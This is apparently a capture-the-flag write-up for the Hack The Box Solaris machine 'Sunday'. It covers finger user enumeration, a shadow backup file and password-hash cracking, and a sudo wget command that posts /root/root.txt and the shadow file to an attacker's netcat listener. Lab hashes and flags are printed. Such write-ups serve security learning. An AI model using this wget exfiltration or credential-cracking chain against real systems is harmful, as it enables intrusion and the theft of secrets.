Writeup: Hack The Box - Machines - Sunday

Description

  • Name: Sunday
  • IP: 10.10.10.76
  • Author: Agent22
  • Difficulty: 3.9/10

Discovery

nmap -sV -sC -Pn -p 1-65535 -T5 10.10.10.76

1
2
3
4
5
6
7
8
9
10
11
12
13
14
PORT      STATE SERVICE   VERSION
79/tcp open finger Sun Solaris fingerd
| finger: Login Name TTY Idle When Where\x0D
| sunny sunny pts/2 7 Wed 08:13 10.10.15.230 \x0D
| sunny sunny pts/3 1 Wed 08:05 10.10.15.162 \x0D
|_sammy sammy pts/4 3 Wed 08:15 10.10.14.100 \x0D
111/tcp open rpcbind 2-4 (RPC #100000)
22022/tcp open ssh SunSSH 1.3 (protocol 2.0)
| ssh-hostkey:
| 1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
|_ 1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
49005/tcp open smserverd 1 (RPC #100155)
51365/tcp open unknown
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
[10.10.10.76]
Login name: sammy In real life: sammy
Directory: /export/home/sammy Shell: /bin/bash
Last login Tue Jun 19 17:20 on pts/2 from 10.10.15.207
No unread mail
No Plan.

Login name: xvm In real life: xVM User
Directory: /
Never logged in.
No unread mail
No Plan.

Login name: openldap In real life: OpenLDAP User
Directory: /
Never logged in.
No unread mail
No Plan.

Login name: nobody In real life: NFS Anonymous Access User
Directory: /
Never logged in.
No unread mail
No Plan.

Login name: noaccess In real life: No Access User
Directory: /
Never logged in.
No unread mail
No Plan.

Login name: nobody4 In real life: SunOS 4.x NFS Anonymous Access User
Directory: /
Never logged in.
No unread mail
No Plan.

Login name: root In real life: Super-User
Directory: /root Shell: /usr/bin/bash
Last login Tue Jun 19 17:25 on pts/2 from sunday
New mail received Tue Apr 24 11:05:47 2018;
unread since Tue Apr 24 11:05:46 2018
No Plan.

The smserverd is a Solaris server that handles request from applications, including the Volume Management daemon to access removable media devices.

Pwn

Using finger we found out a bunch of users and the one with ssh enabled was:

ssh sunny@10.10.10.76 -p 22022 with password sunday.

In /backup/shadow.backup we found a shadow file with both sammy and sunny hash:

1
2
3
4
5
6
7
8
9
10
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

With the passwd file we can start the cracking.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root:x:0:0:Super-User:/root:/usr/bin/bash
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
dladm:x:15:3:Datalink Admin:/:
smmsp:x:25:25:SendMail Message Submission Program:/:
listen:x:37:4:Network Admin:/usr/net/nls:
gdm:x:50:50:GDM Reserved UID:/:
zfssnap:x:51:12:ZFS Automatic Snapshots Reserved UID:/:/usr/bin/pfsh
xvm:x:60:60:xVM User:/:
mysql:x:70:70:MySQL Reserved UID:/:
openldap:x:75:75:OpenLDAP User:/:
webservd:x:80:80:WebServer Reserved UID:/:
postgres:x:90:90:PostgreSQL Reserved UID:/:/usr/bin/pfksh
svctag:x:95:12:Service Tag UID:/:
nobody:x:60001:60001:NFS Anonymous Access User:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/:
sammy:x:101:10:sammy:/export/home/sammy:/bin/bash
sunny:x:65535:1:sunny:/export/home/sunny:/bin/bash

LinEnum.sh, gently offered by someone in the machine (:D), didn’t find anything interesting.

The hash to crack is a salted sha256crypt (-m 7400 in hashcat) format: $5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB.

Using rockyou as wordlist the password is easly cracked: cooldude!.

SSH into the machine as sammy user we got the user flag in /export/home/sammy/Desktop/user.txt.

It’s possible to run wget as root without password because from sudo -l we can see: (root) NOPASSWD: /usr/bin/wget; since wget can POST files we can open a socket to our machine with nc -lvp 3445 and then send the flag file or any other files with wget.

sudo wget --post-file=/root/root.txt 10.10.14.44:3445

Since we had the power we exfiltrated also the shadow and passwd file:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root:$5$WVmHMduo$nI.KTRbAaUv1ZgzaGiHhpA2RNdoo3aMDgPBL25FZcoD:0:0:Super-User:/root:/usr/bin/bash
daemon:NP:1:1::/:
bin:NP:2:2::/usr/bin:
sys:NP:3:3::/:
adm:NP:4:4:Admin:/var/adm:
lp:NP:71:8:Line Printer Admin:/usr/spool/lp:
uucp:NP:5:5:uucp Admin:/usr/lib/uucp:
nuucp:NP:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
dladm:*LK*:15:3:Datalink Admin:/:
smmsp:NP:25:25:SendMail Message Submission Program:/:
listen:*LK*:37:4:Network Admin:/usr/net/nls:
gdm:*LK*:50:50:GDM Reserved UID:/:
zfssnap:NP:51:12:ZFS Automatic Snapshots Reserved UID:/:/usr/bin/pfsh
xvm:*LK*:60:60:xVM User:/:
mysql:NP:70:70:MySQL Reserved UID:/:
openldap:*LK*:75:75:OpenLDAP User:/:
webservd:*LK*:80:80:WebServer Reserved UID:/:
postgres:NP:90:90:PostgreSQL Reserved UID:/:/usr/bin/pfksh
svctag:*LK*:95:12:Service Tag UID:/:
nobody:*LK*:60001:60001:NFS Anonymous Access User:/:
noaccess:*LK*:60002:60002:No Access User:/:
nobody4:*LK*:65534:65534:SunOS 4.x NFS Anonymous Access User:/:
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:101:10:sammy:/export/home/sammy:/bin/bash
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:65535:1:sunny:/export/home/sunny:/bin/bash

Flags

user: a3d9498027ca5187ba1793943ee8a598

root: fb40fab61d99d37536daeec0d97af9b8